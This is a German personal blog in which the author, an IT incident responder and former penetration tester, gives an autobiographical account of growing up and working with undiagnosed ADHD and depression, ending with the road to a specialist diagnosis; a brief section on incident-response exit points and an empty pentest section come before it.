Spätestens mit dem Erreichen eines stabilen Notbetriebs und eines Fahrplanes für die weitere Wiederherstellung oder den Neuaufbau der Infrastruktur ist unser Einsatz als IR-Team meistens vorbei. Andere Firmen haben möglicherweise andere *Exit Points" definiert, und auch wir lassen natürlich einen Kunden, der weiterhin Unterstützung benötigt, nicht im Regen stehen. In so einem Fall besteht immer die Möglichkeit, dass ein reguläres Team die Betreuung übernimmt, das bei BCM- oder Infrastrukturthemen beratend zur Seite steht - dann allerdings mit einem regulären Vertrag. Die IR-Teams sollten natürlich so schnell wie möglich wieder für den nächsten möglichen Vorfall (hoffentlich bei einem anderen Kunden) zur Verfügung stehen! Auch hier wieder der Feuerwehr-Vergleich: Ist das Feuer gelöscht und der Ort des Vorfalls gesichert rücken die Einsatzkräfte wieder ab und die Polizei, die Reinigungskräfte und die zuständigen Planungskräfte für den Wiederaufbau übernehmen.

Penetrationstests (WIP)

pentest

Der Anfang meines Ausflugs in die IT-Security. Fallstricke bei den üblichen Tools und Erkenntnisse aus dem einen oder anderen Pentest finden hier ihren Platz.

Weitere Inhalte folgen

ADHS

adhd

“ADHS - das sind doch die Kinder, die immer am Zappeln sind, die keinen Gedanken beieinander halten und die generell eher quirlige Verhaltensweisen an den Tag legen, oder? Das gibt sich doch im Erwachsenenalter von alleine, das ist doch eigentlich kein Problem.”

Diese oder ähnliche Aussagen bekomme ich von Zeit zu Zeit mit, seit ich mich mit dem Thema beschäftige. Ich selbst hatte ähnliche Ansichten, bis ich realisierte (mit Anfang 40, wohlgemerkt), dass all das irgendwie auch auf mich zutraf und zutrifft - und noch so vieles mehr. Heute glaube ich, das ganze Thema besser einordnen zu können, aber es gibt noch viele offene Fragen und Unsicherheiten. Was bedeutet es, ADHS zu haben? Wie gehe ich damit um, wie meine Umwelt? Ist es eher eine Behinderung oder eine Superkraft und darf ich die Eigenheiten, die ich krankheitsbedingt nun einmal habe, nun eher ausleben als vorher?

Ich möchte an dieser Stelle einen Einblick in mein Leben mit ADHS und den möglicherweise dadurch begünstigten Depressionen geben, sowie meine Gedanken zu bestimmten Aspekten festhalten.

Unterabschnitte von ADHS

Kindheit

childhood

Wie bereits in der Rubrik Über mich angedeutet, hatte ich als Kind starke Anzeichen von ADHS, was damals am ehesten als “Zappelphilipp” bezeichnet worden wäre. Weder der Kinderarzt noch andere Menschen, die mit diesen Auffälligkeiten hätten vertraut sein sollen (Erzieher*innen, Kindergärtner*innen, Lehrer*innen, …), haben dies bemerkt.

Es waren ganz typische Verhaltensweisen und Eigenarten, von denen ich hier nur einige aufzähle, um einen kurzen Überblick zu geben:

  • Vergesslichkeit
  • “Sprechdurchfall”
  • sprunghafte Aufmerksamkeit
  • Lange Konzentration nur bei Dingen, die mich brennend interessierten
  • schlechtes Zeitempfinden
  • Abgelenktheit in der Schule
  • soziale Isolation in Kindergarten und Schule
  • Unzuverlässigkeit
  • Gedankengänge, denen schwer zu folgen war
  • keinerlei Ordnungssinn
  • permanenter hoher Bewegungsdrang und Probleme, dem nicht nachzugeben

Mich selbst und meine Familie hat das alles nicht wirklich belastet. Ich kannte es nicht anders und meine Familie akzeptierte, dass ich manchmal ein wenig wunderlich war. Die Tatsache, dass ich sehr schnell lernte, schnell für Dinge zu begeistern war (allerdings oft auch genauso schnell wieder das Interesse verlor) und keine Berührungsängste gegenüber anderen menschen hatte, hat wohl maßgeblich dazu beigetragen, dass mein Verhalten generell nicht als “abnormal” wahrgenommen wurde. Etwas eigen ja, aber nicht krankhaft.

Ich erinnere mich, dass ich mich in der Grund- und Hauptschule hauptsächlich gelangweilt habe. Meine Noten waren gut bis sehr gut, obwohl ich nach Meinung der Lehrer nie aufpasste. Ein Blick in die Zeugnisse, die ich zu Diagnosezwecken meinem Psychiater mitbrachte, bestätigte diese Erinnerung. Die Hausaufgaben hatte ich auch selten dabei, nicht, weil ich sie im engeren Sinne “vergessen” hätte - ich hatte einfach keine Lust darauf und habe sie so lange vor mir hergeschoben, bis es zu spät war und ich ins Bett musste. Während des Unterrichts war ich oft abgelenkt - ein Trecker auf dem Feld vor dem Klassenzimmer war oft interessanter als die Lehrer*in am Pult und den Rest der Zeit alberte ich leise mit den Klassenkamerad*innen herum.

Zu Hause gab es allerdings auch genug Dinge, die ich interessanter fand als die Hausaufgaben, die ja nur eine Wiederholung dessen waren, was man mir schon in der Schule erzählt hatte, also die reinste Zeitverschwendung waren. Aus meiner Sicht, wohlgemerkt. Warum etwas wiederholen, was man schon verstanden hat? Jedenfalls ging es nachmittags dann entweder an die Lego-Kiste oder an die Bücher, wenn die Abenteuer im Wald nicht noch interessanter waren. Eine lebhafte Phantasie hatte ich schon damals und wenn gerade nichts los war, malte ich mir im Kopf aus, ein Pirat zu sein, oder ein Feuerwehrmann, oder ein Affe, der auf Bäume klettert - das, was die meisten Kinder wohl auch tun würden. Gut, ich kannte kein Ende; wenn ich einmal in “meiner” Welt versunken war, vergaß ich alles um mich herum. Stundenlang auf einer Birke in 6 Metern Höhe hocken und zuweilen sogar dort oben einschlafen? Check. Lokführer mit der Gartenbahn spielen, bis es so dunkel war, dass meine Eltern mich vorsichtshalber reinholen mussten? Check. Mit Lego Phantasiebauwerke, Dungeons mit Falltüren oder komplexe Maschinen bauen, ohne auch nur daran zu denken, etwas zu essen oder zu trinken? Check. Und als irgendwann der C64 bei mir einzog, den meine Eltern mir schenkten (ich glaube, es war zu Weihnachten) war es aus und vorbei. Ich war acht oder neun Jahre alt und hatte nur noch Augen für die “Brotkiste”. Die Handvoll Spiele, die mir dazugelegt wurden, fesselten mich für ein paar Monate, bis ich das dicke Programmierhandbuch entdeckte. Mein Vater hat wohl einige Abende sehr bereut, mir das Gerät besorgt zu haben, denn er musste mir fortan die mir unverständlichen Begriffe in BASIC erklären und übersetzen, damit ich mir selber programmieren beibringen konnte.

Diese selektive Konzentrationsfähigkeit und das Eingraben in Themen, die gerade interessant sind, sind typisch für ADHS-Kinder. Das während des Spielens und Programmierens erforderliche Stillsitzen vor dem Gerät war für mich kein Problem. Zum einen sah es wohl für Außenstehende so aus, als würde ich den Joystick mit dem ganzen Körper bedienen statt mit einer Hand, so sehr ging ich bei jeder Bewegung mit (was im Übrigen beim Spielen mit dem Controller des NES bei Freunden genauso aussah). Zum anderen hing ich wohl schon als Kind mit Vorliebe in den verquersten Körperhaltungen auf dem Stuhl, mein Vater sprach von einem “Schluck Wasser in der Kurve”. Es sind viele kleine Erinnerungen an geflügelte Worte und Situationen, die mir heute helfen, meinen Zustand bis zur Kindheit zurückzuverfolgen und zu plausibilieren.

Jugend

youth

Die echten Probleme gingen im Grunde erst los, als ich durch einen Umzug nach Schleswig-Holstein die Schule wechselte und mein winziger Freundeskreis plötzlich unerreichbar wurde. Ich war zwischenzeitlich auf die Realschule gewechselt, da das nächstgelegene Gymnasium, auf das ich gemessen an den Schulischen Leistungen hätte wechseln sollen, einfach zu weit weg war. Auch in der Realschule waren meine Leistungen gut, daher erschien es sinnvoll, mit dem Umzug den Wechsel ans Gymnasium zu wagen. Das muss ca. in der 6. Klasse gewesen sein.

Wir sind im Übrigen im Laufe meiner Jugend noch einige male umgezogen, vielleicht habe ich daher das “Wandergen” in mir. Lange hielt es mich bisher selten an einem Ort, ohne dass ich das Gefühl hatte, weiterziehen zu müssen. Aber das vorerst nur am Rande.

Cut zum Gymnasium. Meine ersten Tage dort waren schwierig, ich würde sogar sagen: Traumatisch. Ich kannte niemanden. Der Unterrichtsstoff der Gymnasialschüler war ein anderer als der, den ich aus der Realschule kannte, bzw. waren sie uns in einigen Bereichen einfach voraus. Ich hatte also das erste Mal im Leben einen Rückstand aufzuholen, für den ich weder verantwortlich war, noch die notwendigen Hilfsstellungen bekommen habe, um dies zu schaffen. Ich erinnere mich genau an eine Situation mit einer meiner Lehrerinnen zu dieser Zeit. Sie unterrichtete Englisch, was ich in Grundzügen zwar durch meine Programmiertätigkeiten lesen konnte, aber noch nie gesprochen oder bewusst gehört hatte. Heutzutage beginnt der Englischunterricht teils schon in der dritten Klasse, in den 80ern war das noch undenkbar. Ich, der Neue in der Klasse, hatte sowieso einen harten Stand. Die Klassenkamerad*innen fühlten mir auf den Zahn und loteten aus, wie viel ich mir gefallen lasse, während die Lehrer*innen mich teilweise am liebsten wieder auf die Realschule geschickt hätten. Weniger Arbeit, weniger Stress mit dem Nachzügler. Aber zurück zu der Lehrerin. Ich klebte förmlich an ihren Lippen, um ein Gefühl für die Sprache zu bekommen. Unbewusst muss ich stumm die Wörter nach- und mitgesprochen haben, denn an einem der ersten Tage des Unterrichts fuhr sie mich an, ich solle mich unterstehen, sie nachzuäffen. Was ich dummer Realschüler eigentlich am Gymnasium wolle, ich solle zu meinesgleichen gehen, da wäre ich besser aufgehoben. Der Wortlaut kann ich nicht zu 100% wörtlich wiedergeben, aber er war sehr nah an dem, was ich hier schreibe. Später hatte ich bei ihr noch Französisch, denk Dir den Rest…

Manche Lehrer*innen machten mir das Leben schwerer, manche unterstützten mich nach Kräften. Generell erinnere ich mich jedoch im Nachgang an keinen Tag, an dem ich gerne zur Schule gegangen wäre, seit ich auf das Gymnasium gewechselt war. Meine Mitschüler*innen trugen ihren Teil dazu bei, indem sie dem Begriff “Mobbing” eine neue Dimension gaben, die ich nicht kannte und mit der ich nicht umgehen konnte. Ich zog mich zurück, hatte als Klassenaußenseiter mit zwei weiteren Außenseitern (ebenso technikbegeisterte Nerds wie ich) Freundschaft geschlossen, aber die stetigen seelischen und körperlichen Angriffe forderten ihren Tribut. Zweimal Sitzenbleiben, Mitte der 11. Klasse lange Krankheit und danach freiwilliges Ausscheiden aus der Schule.

Was hat das Ganze nun mit ADHS zu tun?

Viele meiner Verhaltensweisen, die ich als Kind und bis zur Realschule noch ganz normal ausgelebt habe (Erinnerung: Für mich war das alles normal und ich wurde akzeptiert wie ich war), führten am Gymnasium zu Problemen. Fehlende Konzentrationsfähigkeit, Störung des Unterrichts durch ständiges Tuscheln (meine Klassenkamerad*innen hatten sehr schnell begriffen, wie schnell ich abzulenken und damit auch zu manipulieren war) und Hibbeln auf dem Stuhl und die bereits bekannten Probleme, die Hausaufgaben abzuliefern. All das wurde auf einmal nicht mehr akzeptiert oder mit guten Absichten getadelt, jedoch nicht nachverfolgt. Plötzlich wurde nahezu alles, was mich ausmachte, kritisiert und gegen mich verwendet. Ich unterstelle den Lehrern dabei nicht einmal böse Absichten; sie konnten mit einem ADHS-Kind einfach nichts anfangen, zudem sie von der Krankheit genausowenig etwas wissen konnten wie ich damals selbst. Das Ganze führte dazu, dass ich mich mehr und mehr zurückzog.

Irgendwann kam das Internet in Mode und wurde auch für Privatpersonen bezahlbar. Einen Optokoppler habe ich live nie gesehen, aber ein analoges Modem blockierte eines Tages die Telefonleitung meiner Familie. Ich frickelte mich durch das entstehende Internet, lernte, probierte aus. Stundenlang. Ich erinnere mich, wie ich mit roten Ohren meinen ersten E-Mail Account erstellte, immer in der Erwartung, dass jetzt irgend etwas schlimmes passieren kann, eine hohe Rechnung oder andere Dinge. Meine erste Homepage. Und dann: Chaträume! EIner der damals größten Anbieter hatte es mir angetan, denn es gab einen Chatraum für Rollenspiele. Ich hatte zwischenzeitlich mit meinen Nerd-Kumpels eine DSA-Runde gestartet und Gefallen an den dynamischen Kopfwelten und dem Würfelglück gefunden, und so fiel es mir nicht schwer, mich in das Chat-Rollenspiel in all seinen Facetten zu verlieren. Und plötzlich war ich Teil einer Community. Leute, mit denen ich frei reden konnte. Leute, die zwar auch manchmal etwas komisch waren, aber mich akzeptierten. Leute, die komische Klamotten trugen und noch komischere Musik hörten. Mein Einstieg in die Gothic-Szene, die mich viele Jahre begleiten sollte und bis heute einen Platz in meinem Herzen hat.

Wir klatschten, tratschten, telefonierten und trafen uns alle paar Monate irgendwo in Deutschland. Die anderen waren genauso seltsam, schräg und spannend wie ich sie mir im Chat vorgestellt hatte. Eine wilde Mischung aus großartigen Menschen und zerbrochenen Existenzen. Und ich mittendrin, auf allen Ebenen. Und rückblickend mit Sicherheit die eine oder andere Leidensgenossen mit undiagnostiziertem ADHS. Das fiel aber bei den ganzen seelischen Schieflagen, die sich in dieser Community offenbarten, auch nicht weiter auf. Ich integrierte mich, stellte für meine Mitstreiter Online-Services bereit (es war die Zeit der Foren, an Facebook, Google & Co. war noch nicht zu denken) und tat alles, um die Gunst der Stunde nicht zu verlieren. An anderer Stelle hatte ich genug zu kämpfen und kompensierte das auf diesem Weg.

Als das Schulleben Anfang 20 (remember: Zweimal sitzen geblieben und tatsächlich schon im Kindergarten ein Extrajahr angehängt wegen “sozialen Anpassungsschwierigkeiten”) für mich zu Ende war, suchte ich mir einen Job, fing eine Ausbildung an, lachte mir meine erste Freundin an, beendete die Ausbildung nach wenigen Monaten, wurde im Ausbildungsbetrieb als unausgebildeter Hauptadministrator fest angestellt und hielt mich irgendwie über Wasser. Emotional ging es jedoch bergab, meine Beziehung zu meinem Vater wurde immer schlechter und ich packte schließlich meine Siebensachen und zog weit, weit weg nach Essen.

Erwachsenenalter

adulthood

Essen - warum ausgerechnet Essen? Ich glaube, das ist die eine Frage, die ich mir in den folgenden drei Jahren am meisten gestellt haben dürfte. Dabei ist die Antwort ganz einfach: Kurzschluss-Reaktion.

Einige Monate nachdem ich meine Ausbildung abgebrochen und den Job als Administrator angenommen hatte, geschahen Dinge, die die Firma in den Konkurs trieben. Mein Leben, das durch verschiedene Umstände reichlich aus den Fugen geraten war und das durch den Job und die damit verbundene Sicherheit etwas stabilisiert wurde, stand plötzlich wieder auf wackligen Beinen. Die sich zuspitzenden Konflikte mit meinem Vater zu Hause und ein Gefühl, nirgendwo richtig hinzupassen in der Gesellschaft führten dazu, dass ich nach Auswegen suchte. Und in dem Moment, als sich einer manifestierte, schlug ich zu. Ein Bekannter bot mir an, mit ihm eine WG zu gründen, zumindest so lange, bis ich wieder einen klaren Kopf haben würde und/oder selbst Fuß gefasst hätte. Ich sollte drei Jahre bei ihm leben.

Ich hatte in den Jahren davor gelernt, mit der Wut, die sich in den Gymnasiums-Jahren in mir angesammelt und sich nicht selten in Jähzorn-Ausbrüchen manifestiert hatte, umzugehen. Beziehungsweise ist “damit umgehen” vermutlich zu viel gesagt ist - ich schluckte sie herunter, ignorierte sie, zwang mich, alles äußerlich ruhig hinzunehmen ohne direkt zu explodieren. Gesünder wäre es vermutlich gewesen, die Wut nur zu verzögern, bis ich mich abreagieren konnte, ohne jemandem zu schaden. Die Erkenntnis kommt leider zu spät.

Auch gelernt hatte ich, dass meine Ängste und Unsicherheiten in Bezug auf andere Menschen und deren Akzeptanz am einfachsten für mich zu handhaben sind, indem ich versuche, mich jedem gegenüber so zu verhalten, wie ich glaubte, dass dieser es erwarten würde. Ich war nie ein unhöflicher Mensch, habe schon mein ganzes Leben lang Wert darauf gelegt, gewisse Umgangsformen einzuhalten, weil ich sie selber als angenehm und wünschenswert empfand. Jedoch hatte ich das Ganze ins Extrem getrieben und versuchte unterbewusst, jedem zu gefallen, um Enttäuschungen und Konflikten aus dem Weg zu gehen.

Man mag sich fragen, wieso. Ich kann es nur vermuten. Ich hatte schon immer Schwierigkeiten, das Verhalten von Menschen zu verstehen. Während Emotionen nahezu ungefiltert auf mich einprasselten (wenn jemand weinte, stiegen mir die Tränen in die Augen; wenn jemand wütend war, ballte ich die Fäuste; wenn Leute lachten und glücklich waren, war ich es auch), überforderten mich die komplett unverständlichen und unvorhersehbaren Reaktionen auf allen anderen Ebenen. Wieso verstanden andere oft nicht das, was ich sagte, sondern etwas, von dem sie glaubten, dass ich es meinte? Wieso sagten sie etwas, meinten aber etwas ganz anderes? Wann meinte jemand etwas ernst und wann scherzte er? Und warum wurde manches was ich sagte als unpassend empfunden, wenn es doch der Wahrheit entsprach? Die feinen Nuancen der menschlichen Kommunikation waren für mich immer eine Hürde. Dazu kam, dass ich mir nichts sehnlicher wünschte, als so spontan und wortgewandt zu sein wie viele andere. Antworten auf unerwartete Fragen, über die ich minutenlang nachdenken musste, kamen bei anderen wie aus der Pistole geschossen. Wenn ich das versuchte, redete ich nur unpassenden Unsinn.

All diese Unsicherheiten und Verständnisprobleme führten nach und nach dazu, dass ich Mechanismen entwickelte, um genau diese Schwächen auszugleichen und vor anderen zu verstecken, denn sie boten Angriffsoberfläche. Ich unterdrückte viele meiner Emotionen, denn damit konnte ich auch bedingt verhindern, dass ich die Emotionen anderer spiegelte und selbst viel stärker als meine eigenen fühlte. Ich ging alle möglichen (auch die unwahrscheinlichen) Abzweigungen von bevorstehenden Gesprächen im Kopf durch und fand schon im Voraus die passendsten Antworten auf die meisten davon. Teilweise lag ich nächtelang wach, weil in meinem Kopf innere Monologe und Dialoge möglicher Gesprächspfade in Dauerschleife abliefen. Das gab mir dann im Gespräch einen Anschein von Spontanität und Schlagfertigkeit und mir bescherte es ein wenig weniger Panik vor dem Kontakt mit Menschen. Die Verständnisprobleme bezüglich der Feinheiten der menschlichen Kommunikation bekam ich damit zwar leider nicht in den Griff, konnte aber auch da mit jedem Tag ein wenig mehr lernen, Situationen besser einzuschätzen und zu lernen, in welchem Kontext manche Dinge dies, in anderen Kontexten aber jenes bedeuteten. Ein unglaublich komplexes Gespinst aus wenn-dann-sonst-Verknüpfungen im Kopf, das permanent Aufmerksamkeit erfordert, aber mich halbwegs sicher durch den Tag navigiert.

Zurück nach Essen. Nach einigen Wochen, die ich brauchte, um überhaupt erstmal die neue Umgebung und den neuen Mitbewohner kennenzulernen und mich zu akklimatisieren, suchten wir gemeinsam neue Jobs. Er war langzeit-arbeitlos, Dauerkiffer und mindestens genauso unsortiert wie ich. Wir bewarben uns beide bei Medion als Hotline-Mitarbeiter: Ich wurde angenommen, er nicht. Bei ihm blieb es leider auch bei diesem einen Versuch, geregelte Einkünfte zu erzielen, in den folgenden Jahren war es meist ich, der den Kühlschrank füllte.

Der neue Job war spannend, aber stressig. Die Lernkurve war auf technischer Ebene nicht sonderlich steil für mich, denn mit Computern und Windows im Speziellen kannte ich mich hervorragend aus, oft besser als so manch alteingesessener Kollege. Aber wie man mit Kunden am Telefon umgeht, wie man ihnen die Informationen, die man braucht, um ihnen zu helfen, herankommt und nicht nur an die, von denen sie glauben, dass sie relevant sind, das wusste ich nicht. Dieser Teil der Lernkurve war steiler als alles, was ich bisher kannte. Ich lernte, Menschen zu verstehen; nicht das, was sie sagten, sondern das, was sie nicht sagten. Und das alles unter Zeitdruck. Wenn ab und zu mal ein Gespräch länger als 10 Minuten dauerte wurde das noch geduldet, wenn es täglich passierte wurde ermahnt, wenn es mehrfach am Tag passierte gab es ernste Gespräche. Und so lernte ich auch, schnell zum Punkt zu kommen, ohne meinem Gegenüber das Gefühl zu geben, dass er oder sie in der Schnellabfertigung gelandet ist. Alles Skills, die mir bis heute gute Dienste leisten. Und bei allem: Immer freundlich bleiben, egal wie wütend mein Gesprächspartner ist. Check. Hatte ich in den Jahren zuvor ja gelernt.

Der Stress, der mit der Beschäftigung in der Hotline kam, wäre vermutlich für mich nicht handhabbar gewesen, aber mir kam an dieser Stelle sehr zugute, dass mein Mitbewohner anfangs immer Cannabis im Haus hatte. Man mag darüber denken wie man will, aber um einen ruhigen Kopf zu bekommen, nachdem man einen stressigen Tag hatte, hilft es. Und so wurde auch ich nach kurzer Zeit zum regelmäßigen Kiffer. Anfangs nur ab und zu nach der Arbeit, dann jeden Abend, irgendwann rauchte ich auch vor der Arbeit zu Hause noch einen halben Joint, um ruhig und gelassen die Schicht zu beginnen. Ich war im Team auch nicht der einzige, der sich auf diese oder ähnliche Art das Arbeiten erleichterte. Mit der Zeit wurde zudem auch das Leben mit meinem Mitbewohner zunehmend zur Belastung, da er mehr und mehr die Kontrolle über sich, sein Leben und seine anger issues verlor, die ich selber ja bereits in den Griff bekommen hatte. Da half auch kein Kiffen mehr und als bei einem seiner Wutanfälle eines Tages mein Handy an der Wand zersplitterte zog ich die Reißleine. Ich zog für ein halbes Jahr zu einem Arbeiskollegen nach Bochum, kündigte kurz darauf und zog relativ spontan wieder in meinem Elternhaus ein.

Eine spannende Entwicklung, aber das sei hier nur am Rande erwähnt, ergab sich zwischen mir und meinem Vater, nachdem ich Jahre zuvor ausgezogen war. Unser Verhältnis besserte sich quasi über Nacht, die ganzen Reibereien, die wir hatten, waren vergessen und nicht mehr existent. Sie kamen auch nicht wieder, als ich wieder zu Hause einzog und den Keller in Beschlag nahm, den mein Vater eigentlich als sein Arbeitszimmer eingerichtet hatte.

Lange sollte das Wohnen bei der Familie auch nicht währen, ich verliebte mich und zog nach Bremen zu meiner Angebeteten. Dort hielt ich mich ein weiteres Jahr in einer Hotline über Wasser und begann dann meine erste ernsthafte Ausbildung als Fachinformatiker für Systemintegration - tatsächlich meine zweite Wahl, aber Anwendungsentwickler gab es offenbar schon genug. Die drei Ausbildungsjahre verliefen relativ ereignislos, in der Berufsschule lieferte ich gute Noten ab, langweilte mich zu Tode, hatte mit einigen Lehrern eine Art stumme Vereinbarung, dass ich nicht jede Fehlstunde eingetragen bekomme, solange meine Noten nicht absacken, und so verbrachte ich viel Zeit in der IT-Abteilung der Firma, teilte mein Wissen mit den anderen Auszubildenden, hielt die Infrastruktur am Laufen, setzte die Wünsche meiner Kollegen wenn möglich um und lernte allerlei über die internationale Vernetzung von Standorten, den Betrieb von SAP-Systemen und auch, wie man mit dem einen oder anderen Ausfall von Teilen der Infrastruktur umgeht. Ein kleiner Ausblick auf meine spätere Laufbahn im Incident Response? Vielleicht…

Die Beziehung endete, andere kamen und gingen und auch die Ausbildung ging irgendwann zu Ende. Ein 2er-Schnitt, nicht schlecht, hätte eine 1 überall sein können, wenn ich gelernt oder mich angestrengt hätte. Aber ich konnte mich nicht dazu durchringen. Dieses “mich zu etwas zwingen” war schon immer ein Problem, auf allen Ebenen. Schule, Beruf, Beziehung, Alltag. Dinge, die ich nicht als direkt sinnvoll oder zielführend erkannte, vernachlässigte ich. Aufgaben, die mir Spaß machten, waren dagegen eher Selbstläufer. Alles, was sich stumpf wiederholte war mein Todfeind, vermutlich auch einer der Gründe, warum ich selber rückblickend nicht sonderlich beziehungsfähig zu sein scheine und auch den Arbeitgeber recht regelmäßig nach 2-4 Jahren wechselte. Am Anfang ist alles spannend, aber nach Monaten bis Jahren stellt sich Routine ein. Und Routine vertrage ich nicht.

So auch mit der Ausbildungsfirma. Drei Jahre Ausbildung waren beendet und ich freute mich auf mehr Verantwortung und mehr Entscheidungsmöglichkeiten in der IT-Umgebung. Es kam anders, entgegen vorigen Absprachen bekam ich einen IT-Leiter vorgesetzt, mit dem ich weder menschlich noch fachlich auf einen Nenner kam und die Aufgaben blieben größtenteils dieselben. Dazu kamen nun auf Weisung des neuen Vorgesetzten viele strukturelle Vorgaben, die mir weder sinnvoll erschienen, noch in meine Arbeitsweise passten. Ich hatte aber auch gelernt, Dingen Zeit zu geben, da ich mich mit der Zeit an manches gewöhnen und anpassen konnte oder sich Situationen von alleine lösen. Und so blieb ich weitere drei Jahre in der IT, half meinen nachfolgenden Azubis, durch ihre Ausbildung zu kommen und versuchte, den IT-Leiter so gut es ging zu ertragen, zu ignorieren oder zu konfrontieren, wenn es ganz unerträglich wurde. Leider gab es diesbezüglich wenig Rückhalt seitens der Führungsebene und so gab ich schließlich auf.

Zu dieser Zeit geschahen mehrere Dinge, die mich seelisch aus der Bahn warfen. Der stärkste Faktor war der Tod meines Vaters, den ich jahrelang nicht verkraftet habe. Auch heute fällt es mir teilweise schwer, darüber nachzudenken. Ich hatte mir ungefähr in derselben Zeit bei einem Fahrradunfall einen Wirbel gebrochen und hatte die Aussicht, für den Rest meines Lebens mit Einschränkungen planen zu müssen, außerdem hatten meine damalige Freundin und ich uns frisch getrennt und es war keine von den ruhigen Trennungen, die zwar weh tun, aber sich richtig anfühlen. Sprich: Absolutes Gefühlschaos und die Aussicht auf eine ungewisse Zukunft, und es passierte das, was schon damals vor dem Umzug nach Essen passierte: Kurzschluss, Überschlagshandlung. Ich kündigte den Arbeits- und Mietvertrag und zog zu meinem damals besten Freund nach Berlin.

Kaum eingezogen wurde klar, dass die Wohnung für zwei Personen deutlich zu klein war. Da das Zusammenleben ansich aber gut zu funktionieren schien, beschlossen wir, eine WG mit zwei weiteren Menschen zu gründen. Gesagt, getan, es entstand eine WG, die über die Jahre eine hohe Mitbewohner-Fluktuation hatte und bei der ich am Ende der letzte verbliebene ursprüngliche Mieter war.

Während der WG-Zeit wurde klar, dass mit mir etwas nicht stimmte. Psychisch, seelisch, generell. Meine beste Freundin, die auf der anderen Seite Deutschlands lebte, nahm sich das Leben und meine emotionale Reaktion darauf blieb nahezu komplett aus. Die primäre Gefühlsregung war Unmut darüber, dass ich mir nun für den nächsten geplanten beruflichen Aufenthalt in der Region eine Alternativplanung für das dazwischenliegende Wochenende überlegen müsse. Nur ein Anflug von Trauer, der Verlust kam bei mir emotional nicht an. Mein nächster Weg war dann der zum Hausarzt, der eine mittelgradige Depression vermutete und mich zum Psychiater überwies, der dann exakt diese Diagnose stellte. Es folgten Jahre des Ausprobierens verschiedenster Antidepressiva, die ich allesamt körperlich nicht vertrug. Psychisch machten sie keinen Unterschied. An einen Therapieplatz zu kommen war schwierig und so landete ich kurzfristig zwar in einer Tagesklinik, die mich kurzzeitig stabilisierte, aber nach ein paar Monaten ging es mir wieder sehr schlecht.

Die Erkenntnis, die mich zum Facharzt trieb, war nur der Gipfel vieler Dinge, die mir in den Jahren davor, speziell in der Berliner Zeit, hätten auffallen können. Bereits in Bremen diagnostizierte ein Arzt Burnout, schwammig wie zu erwarten, und nahm mich für einige Wochen aus dem Arbeitsalltag. In Berlin hatte ich anfangs nur Schwierigkeiten, mich in Aufgaben einzuarbeiten und hatte keine weiteren Einschränkungen. Ich hatte einen großen Bekanntenkreis, mit dem ich viel unterwegs war und hatte Spaß daran, mich mit Menschen zu umgeben. Ich hatte acht Jahre lang in Bremen eine Großcommunity betreut, die meine damalige Partnerin und ich ins Leben gerufen hatten und die am Ende über 2000 Mitglieder zählte. Ich war den Umgang mit Menschen inzwischen gewohnt und hatte gelernt, wie ich mich zu verhalten hatte, um akzeptiert zu werden. Doch in Berlin ebbte der Menschenkontakt mit den Jahren immer mehr ab. Wo ich anfangs fast jedes Wochenende mit den WG-Mitgliedern, Freunden und Bekannten feiern war, Festivals und Konzerte nicht nur besuchte, sondern im Rahmen der gemeinsamen Band auch auftrat, zog ich mich mit der Zeit mehr und mehr zurück, verließ selten das Haus und trat aus der Band aus. Beruflich war ich seinerzeit als Penetrationstester tätig und mir fiel immer öfter auf, dass ich die anfallenden Berichte nur unter größter Überwindung schreiben konnte; am Ende schaffte ich es nicht einmal mehr, die Vorlage zu öffnen und den Namen des Kunden einzutragen. Die WG ging in die Brüche, da ich den Anforderungen der anderen Mitbewohner nicht mehr gerecht werden konnte und diese nicht damit umgehen konnten, dass ich aktuell nicht anders kann als mich zurückzuziehen. Ich zog aus, was (meinerseits unbeabsichtigt, aber nicht änderbar) das Ende des Mietvertrages für die ganze WG bedeutete.

An dieser Stelle war ich durch die Depressionen teilweise schon so gelähmt, dass ich es an manchen Tagen nicht mal mehr schaffte, das Bett zu verlassen. Der Arbeitgeber fing mich auf, war besorgt und gewährte mir die Freiräume, die ich brauchte, um trotzdem auf irgend eine Art weiter am Betriebsgeschehen teilzunehmen. Der Wechsel in andere Aufgabenbereiche und Abteilungen brachte kurzzeitig Erleichterung, aber auch das Verständnis und die Unterstützung von Vorgesetzten und Kollegen war überwältigend und nahm mir eine Menge meiner Ängste. Schließlich fand ich einen Therapeuten, der zwar nicht die erhoffte tiefenpsychologische Psychotherapie anbieten konnte, aber immerhin eine Gruppentherapie, die langsam aber sicher kleine Verbesserungen bewirkte und dies bis heute tut.

Der Weg zur Diagnose

before diagnosis

Kaum hatte ich die Therapie begonnen, kam (wie in meinem Leben üblich) überraschend der seit Jahren eingeschlafene Kontakt zu einer alten Freundin aus Bremer Zeiten wieder zustande. Man tauschte sich aus und plötzlich lag das Thema ADHS auf dem Tisch. Sie sei diagnostiziert worden und seitdem ginge es ihr deutlich besser. Es kristallisierte sich heraus, dass sie mit ganz ähnlichen Dingen zu kämpfen hatte, die ich selber nur allzu gut kannte, aber nie als abnormal wahrgenommen hatte, denn ich kannte es ja nicht anders. Ich begann, mich mit der Thematik auseinander zu setzen und erkannte extrem viele Paralleleln zu meiner eigenen Vergangenheit und Gegenwart. Ich lernte, dass ADHS nicht auf magische Weise im Erwachsenenalter verschwindet, dass es eine unbekannte Dunkelziffer an undiagnostizierten Personen gibt und dass man auch als Erwachsener versuchen kann, eine entsprechende Diagnose zu bekommen, wenn man die Vermutung hat, betroffen zu sein. Das brachte mich dazu, mit einem neuen Arbeitskollegen zu sprechen, der ebenfalls diagnostiziert wurde und relativ offen mit der Diagnose umging. Über ihn bekam ich die Adresse eines Dacharztes für ADHS und verwandte Themen und viele Informationen zum Umgang mit dieser Krankheit. Spannend war auch zu erleben, wie viele andere Kollegen sich nach kurzer Zeit ebenfalls als bereits diagnostiziert oder mit einem starken Verdacht “outeten”. Einige sind wie ich erst durch diesen gemeinsamen Austausch das erste Mal damit zum Arzt gegangen und einige sind inzwischen ebenfalls diagnostiziert.

Lange Rede, kurzer Sinn: Mein bisheriger Psychiater, bei dem ich wegen der Depressionsthematik in Behandlung war, schloss ADHS bei mir kategorisch aus. Ich bat ihn, dennoch die entsprechenden Testreihen mit mir durchzugehen, welche ich dann auf eigene Kosten auch absolvierte. Und die Ergebnisse waren aus meiner Sicht relativ deutlich, selbst als Laie konnte ich die starken Abweichungen von vielen Prüfpunkten sehen. Mein Psychiater allerdings beharrte auf seiner Meinung, und so wechselte ich zu dem Facharzt, den mein Kollege mir nannte.

